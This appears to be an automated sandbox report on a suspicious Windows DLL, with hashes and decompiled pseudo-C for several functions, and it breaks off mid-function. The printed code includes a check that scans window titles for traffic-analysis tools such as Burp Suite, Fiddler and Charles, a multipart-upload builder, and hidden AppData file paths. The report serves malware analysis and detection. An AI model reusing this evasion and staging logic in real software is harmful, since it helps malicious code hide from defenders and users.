Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: 612a82e7f905e4fadff19306b7dac36e1d559707925f7834b75f507085b4ae3e
Instruction ID: c4092c56797faab5bd9b61a6cf6905532769cb289c64f9062f49348239aa7e77
Opcode Fuzzy Hash: 612a82e7f905e4fadff19306b7dac36e1d559707925f7834b75f507085b4ae3e
Instruction Fuzzy Hash: D590023104461C8B964027A5689DB55775CA5449157944051E50D415129A55642145A5

Uniqueness

Uniqueness Score: -1.00%

Function 10019DE0, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb5b8d722a8140dbf32dbae953001c1121db2f258d5d916192a685ee3fa6d34
Instruction ID: 400514f795efa1174e6a2b3ff4f6cc3dc550215f7dc1e9ae67a216db31666afb
Opcode Fuzzy Hash: fcb5b8d722a8140dbf32dbae953001c1121db2f258d5d916192a685ee3fa6d34
Instruction Fuzzy Hash: 65D0A93291620CEFC700CF94C902B8EB3F8E700340F1040A8E80487200D2399F10DA81

Uniqueness

Uniqueness Score: -1.00%

Function 10019ED0, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
Instruction ID: afa243e2bbc7d5b73eef9c76600441106c915adb5c9f305da66005335667999b
Opcode Fuzzy Hash: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
Instruction Fuzzy Hash: FCD0A92059D2CC6ECB02CBB88411BA9BFF88716600F0802C4E888C3382C02A820983A1

Uniqueness

Uniqueness Score: -1.00%

Function 10021460, Relevance: 48.4, APIs: 32, Instructions: 449
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10021460(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v543;
				char _v544;
				char _v807;
				char _v808;
				char* _v812;
				char _v1079;
				char _v1080;
				char* _v1084;
				char* _v1088;
				char _v1599;
				char _v1600;
				intOrPtr _v1604;
				char _v15703;
				char _v15704;
				char* _v15708;
				char _v29807;
				char _v29808;
				char* _v29812;
				char _v43911;
				char _v43912;
				char _v58007;
				char _v58008;
				char _v58024;
				char _v58052;
				char _v58080;
				char _v58084;
				void* __esi;
				void* _t172;
				intOrPtr _t179;
				void* _t186;
				void* _t195;
				void* _t216;
				void* _t218;
				void* _t237;
				void* _t254;
				intOrPtr _t297;
				intOrPtr _t357;
				void* _t359;
				void* _t366;
				void* _t376;
				void* _t385;
				void* _t392;

				_t353 = __edi;
				_t265 = __ebx;
				_push(0xffffffff);
				_push(E10022B1C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t357;
				E10018AA0(0xe2d4);
				_push(_t354);
				_v24 = 0;
				_v28 = "--";
				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
					_v1084 = "Content-Type: %s";
					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
					_v808 = 0;
					E1000CF20(__edi,  &_v807, 0, 0x103);
					_v1080 = 0;
					E1000CF20(_t353,  &_v1079, 0, 0x103);
					_v1600 = 0;
					E1000CF20(_t353,  &_v1599, 0, 0x1ff);
					_push(_a20);
					_push(_a16);
					E1000CC93(_t353,  &_v808, _v812, _a16);
					E1000CC93(_t353,  &_v1080, _v1084, _a24);
					_push( &_v1080);
					_push( &_v808);
					_push(_a4);
					E1000CC93(_t353,  &_v1600, _v1088, _v28);
					_t392 = _t357 + 0x5c;
					if( *_a36 != 0) {
						E1000D190(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAC0( &_v1600));
						_t392 = _t392 + 0x10;
					}
					_t254 = E1000CAC0( &_v1600);
					_t357 = _t392 + 4;
					_v24 = _t254 + _v24;
					if( *_a36 != 0) {
						E1000D190(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
						_t357 = _t357 + 0xc;
					}
					_v24 = _v24 + _a32;
				}
				if(_a8 != 0 && _a12 > 0) {
					_t172 = E10001A50(_a8, "=");
					_t357 = _t357 + 8;
					if(_t172 != 0) {
						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
						_v58008 = 0;
						E1000CF20(_t353,  &_v58007, 0, 0x370f);
						_v29808 = 0;
						E1000CF20(_t353,  &_v29807, 0, 0x370f);
						_v43912 = 0;
						E1000CF20(_t353,  &_v43911, 0, 0x370f);
						_v15704 = 0;
						E1000CF20(_t353,  &_v15703, 0, 0x370f);
						_t179 = E10001A50(_a8, "&");
						_t366 = _t357 + 0x38;
						_v1604 = _t179;
						if(_v1604 != 0) {
							E10001160( &_v58052, __eflags, _a8);
							_v8 = 0;
							E10002FE0( &_v58024, __eflags);
							_v8 = 1;
							E10001160( &_v58080, __eflags, "&");
							_v8 = 2;
							E1001A850(__eflags,  &_v58052,  &_v58024,  &_v58080);
							_t357 = _t366 + 0xc;
							_v58084 = 0;
							while(1) {
								_t186 = E100021E0( &_v58024);
								__eflags = _v58084 - _t186;
								if(_v58084 >= _t186) {
									break;
								}
								E1000CF20(_t353,  &_v43912, 0, 0x3710);
								E1000CF20(_t353,  &_v15704, 0, 0x3710);
								_t195 = E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=");
								_t354 = _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084));
								E1000D190(_t265, _t353, _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E10003030( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)));
								E1000D8A3(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=") + 1);
								E1000CF20(_t353,  &_v58008, 0, 0x3710);
								E1000CF20(_t353,  &_v29808, 0, 0x3710);
								E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
								_push( &_v15704);
								_push( &_v58008);
								_push(_a4);
								E1000CC93(_t353,  &_v29808, _v29812, _v28);
								_t376 = _t357 + 0x7c;
								__eflags =  *_a36;
								if( *_a36 != 0) {
									_t218 = E1000CAC0( &_v29808);
									__eflags =  *_a36 + _v24;
									E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
									_t376 = _t376 + 0x10;
								}
								_t216 = E1000CAC0( &_v29808);
								_t357 = _t376 + 4;
								_v24 = _t216 + _v24;
								_t297 = _v58084 + 1;
								__eflags = _t297;
								_v58084 = _t297;
							}
							_v8 = 1;
							E100011A0( &_v58080);
							_v8 = 0;
							E10003010( &_v58024);
							_v8 = 0xffffffff;
							E100011A0( &_v58052);
						} else {
							E1000D190(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
							E1000D8A3(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
							E1000CF20(_t353,  &_v58008, 0, 0x3710);
							E1000CF20(_t353,  &_v29808, 0, 0x3710);
							E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
							_push( &_v15704);
							_push( &_v58008);
							_push(_a4);
							E1000CC93(_t353,  &_v29808, _v29812, _v28);
							_t385 = _t366 + 0x64;
							if( *_a36 != 0) {
								E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAC0( &_v29808));
								_t385 = _t385 + 0x10;
							}
							_t237 = E1000CAC0( &_v29808);
							_t357 = _t385 + 4;
							_v24 = _t237 + _v24;
						}
					}
				}
				_v20 = "\r\n%s%s%s\r\n";
				_v544 = 0;
				E1000CF20(_t353,  &_v543, 0, 0x1ff);
				_push(_v28);
				_push(_a4);
				E1000CC93(_t353,  &_v544, _v20, _v28);
				_t359 = _t357 + 0x20;
				if( *_a36 != 0) {
					E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAC0( &_v544));
					_t359 = _t359 + 0x10;
				}
				_v24 = E1000CAC0( &_v544) + _v24;
				 *[fs:0x0] = _v16;
				return _v24;
			}

0x10021460
0x10021460
0x10021463
0x10021465
0x10021470
0x10021471
0x1002147d
0x10021482
0x10021483
0x1002148a
0x10021495
0x100214c3
0x100214cd
0x100214d7
0x100214e1
0x100214f6
0x100214fe
0x10021513
0x1002151b
0x10021530
0x1002153b
0x1002153f
0x10021552
0x1002156c
0x1002157a
0x10021581
0x10021585
0x10021598
0x1002159d
0x100215a6
0x100215c8
0x100215cd
0x100215cd
0x100215d7
0x100215dc
0x100215e2
0x100215eb
0x100215fe
0x10021603
0x10021603
0x1002160c
0x1002160c
0x10021613
0x1002162c
0x10021631
0x10021636
0x1002163c
0x10021646
0x10021650
0x10021665
0x1002166d
0x10021682
0x1002168a
0x1002169f
0x100216a7
0x100216bc
0x100216cd
0x100216d2
0x100216d5
0x100216e2
0x10021802
0x10021807
0x10021814
0x10021819
0x10021828
0x1002182d
0x10021846
0x1002184b
0x1002184e
0x10021869
0x1002186f
0x10021874
0x1002187a
0x00000000
0x00000000
0x1002188e
0x100218a4
0x100218cb
0x100218ee
0x10021912
0x10021951
0x10021967
0x1002197d
0x1002199a
0x100219a8
0x100219af
0x100219b3
0x100219c6
0x100219cb
0x100219d1
0x100219d4
0x100219dd
0x100219f2
0x100219f6
0x100219fb
0x100219fb
0x10021a05
0x10021a0a
0x10021a10
0x10021860
0x10021860
0x10021863
0x10021863
0x10021a18
0x10021a22
0x10021a27
0x10021a31
0x10021a36
0x10021a43
0x100216e8
0x10021708
0x10021731
0x10021747
0x1002175d
0x1002177a
0x10021788
0x1002178f
0x10021793
0x100217a6
0x100217ab
0x100217b4
0x100217d6
0x100217db
0x100217db
0x100217e5
0x100217ea
0x100217f0
0x100217f0
0x100216e2
0x10021636
0x10021a48
0x10021a4f
0x10021a64
0x10021a6f
0x10021a73
0x10021a83
0x10021a88
0x10021a91
0x10021ab3
0x10021ab8
0x10021ab8
0x10021acd
0x10021ad6
0x10021ae1

APIs

_memset.LIBCMT ref: 100214F6
_memset.LIBCMT ref: 10021513
_memset.LIBCMT ref: 10021530
_sprintf.LIBCMT ref: 10021552
_strlen.LIBCMT ref: 100215AF
_strlen.LIBCMT ref: 100215D7
_sprintf.LIBCMT ref: 10021598

Part of subcall function 1000CC93: __flsbuf.LIBCMT ref: 1000CD01

_sprintf.LIBCMT ref: 1002156C

Part of subcall function 1000CC93: __output_l.LIBCMT ref: 1000CCE6

_memset.LIBCMT ref: 10021665
_memset.LIBCMT ref: 10021682
_memset.LIBCMT ref: 1002169F
_memset.LIBCMT ref: 100216BC
_strcpy_s.LIBCMT ref: 10021731
_memset.LIBCMT ref: 10021747
_memset.LIBCMT ref: 1002175D
_sprintf.LIBCMT ref: 1002177A
_sprintf.LIBCMT ref: 100217A6
_strlen.LIBCMT ref: 100217BD
_strlen.LIBCMT ref: 100217E5
_memset.LIBCMT ref: 1002188E
_memset.LIBCMT ref: 100218A4
_strcpy_s.LIBCMT ref: 10021951
_memset.LIBCMT ref: 10021967
_memset.LIBCMT ref: 1002197D
_memset.LIBCMT ref: 10021A64
_sprintf.LIBCMT ref: 10021A83
_strlen.LIBCMT ref: 10021A9A
_strlen.LIBCMT ref: 10021AC2

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
String ID:
API String ID: 854390245-0
Opcode ID: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
Instruction ID: 2d82e108429a1e59b14db5b6321f6623d8f234d0aa847db4e2dbab4e051ccd9c
Opcode Fuzzy Hash: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
Instruction Fuzzy Hash: BC0290B6D00218ABDB10DB90DC82FDE777DEB58340F4445A8F509A7285EB74AB44CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 100133E0, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100133E0(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10333818 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033381c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10333820 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10333818;
					_t40 = TlsSetValue;
					 *0x10333824 = _t7;
					if( *0x10333818 == 0) {
						L6:
						 *0x1033381c = TlsGetValue;
						 *0x10333818 = E10013097;
						 *0x10333820 = _t40;
						 *0x10333824 = TlsFree;
					} else {
						__eflags =  *0x1033381c;
						if( *0x1033381c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10333820;
							if( *0x10333820 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10332c6c = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033381c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100117FA();
							 *0x10333818 = E10012FC8( *0x10333818);
							 *0x1033381c = E10012FC8( *0x1033381c);
							 *0x10333820 = E10012FC8( *0x10333820);
							 *0x10333824 = E10012FC8( *0x10333824);
							_t18 = E1000F88D();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E100130CA();
								goto L15;
							} else {
								_push(L10013256);
								_t21 =  *((intOrPtr*)(E10013034( *0x10333818)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10332c68 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E100148B1(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10332c68);
										__eflags =  *((intOrPtr*)(E10013034( *0x10333820)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10013107(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E100130CA();
					return 0;
				}
			}

0x100133e0
0x100133ec
0x100133f0
0x10013410
0x1001341d
0x1001342a
0x1001342f
0x10013431
0x10013438
0x1001343e
0x10013443
0x1001345b
0x10013460
0x1001346a
0x10013474
0x1001347a
0x10013445
0x10013445
0x1001344c
0x00000000
0x1001344e
0x1001344e
0x10013455
0x00000000
0x10013457
0x10013457
0x10013459
0x00000000
0x00000000
0x10013459
0x10013455
0x1001344c
0x1001347f
0x10013485
0x10013488
0x1001348d
0x1001355f
0x1001355f
0x1001355f
0x10013493
0x1001349a
0x1001349c
0x1001349e
0x00000000
0x100134a4
0x100134a4
0x100134ba
0x100134ca
0x100134da
0x100134e7
0x100134ec
0x100134f1
0x100134f3
0x1001355a
0x1001355a
0x00000000
0x100134f5
0x100134f5
0x10013506
0x10013508
0x1001350b
0x10013510
0x00000000
0x10013512
0x1001351e
0x10013520
0x10013524
0x00000000
0x10013526
0x10013526
0x10013527
0x1001353b
0x1001353d
0x00000000
0x1001353f
0x1001353f
0x10013541
0x10013542
0x10013549
0x1001354f
0x10013553
0x10013557
0x10013557
0x1001353d
0x10013524
0x10013510
0x100134f3
0x1001349e
0x10013563
0x100133f2
0x100133f2
0x100133fa
0x100133fa

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000E9BD), ref: 100133E6
__mtterm.LIBCMT ref: 100133F2

Part of subcall function 100130CA: __decode_pointer.LIBCMT ref: 100130DB
Part of subcall function 100130CA: TlsFree.KERNEL32(00000024,1001355F), ref: 100130F5

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10013408
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10013415
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10013422
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001342F
TlsAlloc.KERNEL32 ref: 1001347F
TlsSetValue.KERNEL32(00000000), ref: 1001349A
__init_pointers.LIBCMT ref: 100134A4
__encode_pointer.LIBCMT ref: 100134AF
__encode_pointer.LIBCMT ref: 100134BF
__encode_pointer.LIBCMT ref: 100134CF
__encode_pointer.LIBCMT ref: 100134DF
__decode_pointer.LIBCMT ref: 10013500
__calloc_crt.LIBCMT ref: 10013519
__decode_pointer.LIBCMT ref: 10013533
__initptd.LIBCMT ref: 10013542
GetCurrentThreadId.KERNEL32 ref: 10013549

Strings

KERNEL32.DLL, xrefs: 100133E1
FlsFree, xrefs: 10013424
FlsGetValue, xrefs: 1001340A
FlsSetValue, xrefs: 10013417
FlsAlloc, xrefs: 10013402

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
Instruction ID: fc5c9c1e2f27ce9595d1d322ac009eb1f7bdbda0747ab5db418f9efda91381a0
Opcode Fuzzy Hash: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
Instruction Fuzzy Hash: A3318D75C04221AADB12EB78CCC69057BE9EB843A1F10C53AF508DE2A2DB35D489CF90

Uniqueness

Uniqueness Score: -1.00%

Function 100193D0, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100193D0(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t61;
				void* _t66;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t87 = __edi;
				_t70 = __ebx;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t87,  &_v267, 0, 0x103);
				GetClassNameA(_a4,  &_v532, 0x104);
				GetWindowTextA(_a4,  &_v268, 0x104);
				_t35 = E1000CAC0( &_v532);
				_t91 = _t88 + 0x1c;
				_t108 = _t35;
				if(_t35 <= 0) {
					L30:
					return 1;
				}
				_t37 = E10019330(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
				_t92 = _t91 + 8;
				if(_t37 == 0) {
					_t38 = E10019330(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
					_t93 = _t92 + 8;
					__eflags = _t38;
					if(__eflags == 0) {
						_t39 = E10019330(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
						_t94 = _t93 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							_t41 = E10019330(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
							_t95 = _t94 + 8;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = E10019330(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
								_t96 = _t95 + 8;
								__eflags = _t42;
								if(_t42 == 0) {
									_t43 = E1000CAC0( &_v268);
									_t97 = _t96 + 4;
									__eflags = _t43;
									if(__eflags <= 0) {
										L20:
										_t45 = E1000CAC0( &_v268);
										_t98 = _t97 + 4;
										__eflags = _t45;
										if(__eflags <= 0) {
											L23:
											_t46 = E10019330(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
											_t99 = _t98 + 8;
											__eflags = _t46;
											if(_t46 == 0) {
												goto L30;
											}
											_t48 = E1000CAC0( &_v268);
											_t100 = _t99 + 4;
											__eflags = _t48;
											if(__eflags <= 0) {
												L27:
												__eflags = E1000CAC0( &_v268);
												if(__eflags <= 0) {
													goto L30;
												}
												_t51 = E10019330(_t70, _t87, __eflags,  &_v268, "Burp Suite");
												__eflags = _t51;
												if(_t51 == 0) {
													goto L30;
												}
												 *0x10333dcc = 1;
												return 0;
											}
											_t53 = E10019330(_t70, _t87, __eflags,  &_v268, "Charles");
											_t100 = _t100 + 8;
											__eflags = _t53;
											if(_t53 == 0) {
												goto L27;
											}
											 *0x10333dcc = 1;
											return 0;
										}
										_t55 = E10019330(_t70, _t87, __eflags,  &_v268, "ASExplorer");
										_t98 = _t98 + 8;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L23;
										}
										 *0x10333dcc = 1;
										return 0;
									}
									_t57 = E10019330(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
									_t97 = _t97 + 8;
									__eflags = _t57;
									if(_t57 == 0) {
										goto L20;
									}
									 *0x10333dcc = 1;
									return 0;
								}
								__eflags = E1000CAC0( &_v268);
								if(__eflags <= 0) {
									L16:
									goto L30;
								}
								_t61 = E10019330(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
								__eflags = _t61;
								if(_t61 == 0) {
									goto L16;
								}
								 *0x10333dcc = 1;
								return 0;
							}
							 *0x10333dcc = 1;
							return 0;
						}
						 *0x10333dcc = 1;
						return 0;
					}
					 *0x10333dcc = 1;
					return 0;
				}
				_t66 = E1000CAC0( &_v268);
				_t110 = _t66;
				if(_t66 <= 0 || E10019330(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
					goto L30;
				} else {
					 *0x10333dcc = 1;
					return 0;
				}
			}

0x100193d0
0x100193d0
0x100193d9
0x100193ee
0x100193f6
0x1001940b
0x10019423
0x10019439
0x10019446
0x1001944b
0x1001944e
0x10019450
0x100196a0
0x00000000
0x100196a0
0x10019462
0x10019467
0x1001946c
0x100194bb
0x100194c0
0x100194c3
0x100194c5
0x100194e9
0x100194ee
0x100194f1
0x100194f3
0x10019517
0x1001951c
0x1001951f
0x10019521
0x10019545
0x1001954a
0x1001954d
0x1001954f
0x10019599
0x1001959e
0x100195a1
0x100195a3
0x100195d3
0x100195da
0x100195df
0x100195e2
0x100195e4
0x10019614
0x10019620
0x10019625
0x10019628
0x1001962a
0x00000000
0x00000000
0x10019633
0x10019638
0x1001963b
0x1001963d
0x10019667
0x10019676
0x10019678
0x00000000
0x00000000
0x10019686
0x1001968e
0x10019690
0x00000000
0x00000000
0x10019692
0x00000000
0x1001969c
0x1001964b
0x10019650
0x10019653
0x10019655
0x00000000
0x00000000
0x10019657
0x00000000
0x10019661
0x100195f2
0x100195f7
0x100195fa
0x100195fc
0x00000000
0x00000000
0x100195fe
0x00000000
0x10019608
0x100195b1
0x100195b6
0x100195b9
0x100195bb
0x00000000
0x00000000
0x100195bd
0x00000000
0x100195c7
0x10019560
0x10019562
0x1001958d
0x00000000
0x1001958d
0x10019570
0x10019578
0x1001957a
0x00000000
0x00000000
0x1001957c
0x00000000
0x10019586
0x10019523
0x00000000
0x1001952d
0x100194f5
0x00000000
0x100194ff
0x100194c7
0x00000000
0x100194d1
0x10019475
0x1001947d
0x1001947f
0x00000000
0x10019499
0x10019499
0x00000000
0x100194a3

APIs

_memset.LIBCMT ref: 100193EE
_memset.LIBCMT ref: 1001940B
GetClassNameA.USER32(?,00000000,00000104), ref: 10019423
GetWindowTextA.USER32 ref: 10019439
_strlen.LIBCMT ref: 10019446

Part of subcall function 10019330: _strlen.LIBCMT ref: 1001933B
Part of subcall function 10019330: _strlen.LIBCMT ref: 10019349

_strlen.LIBCMT ref: 10019475

Strings

Burp Suite, xrefs: 1001967A
Afx:400000:8:10003:0:, xrefs: 10019456
SunAwtFrame, xrefs: 10019614
WPE, xrefs: 10019481
Telerik Fiddler, xrefs: 100195A5
Charles, xrefs: 1001963F
ASExplorer, xrefs: 100195E6
TCPViewClass, xrefs: 100194AF
TStdHttpAnalyzerForm, xrefs: 100194DD
XTPMainFrame, xrefs: 10019539
HTTP Debugger, xrefs: 10019564
gdkWindowToplevel, xrefs: 1001950B

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen$_memset$ClassNameTextWindow
String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
API String ID: 1565133231-1140939848
Opcode ID: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
Instruction ID: a5f97e290b41472754b7e9ce8727d5d20b8c63e5840e42e0df40fd03ad5c4008
Opcode Fuzzy Hash: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
Instruction Fuzzy Hash: 1C51B7B995020956EB50C770AC85FDA72BCEB20348F444464AA099B142FBB5F7C8CF71

Uniqueness

Uniqueness Score: -1.00%

Function 1001FA30, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF20(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF20(_t77,  &_v267, 0, 0x103);
				E1001F990(__ebx, _t77, __esi, _t94,  &_v268);
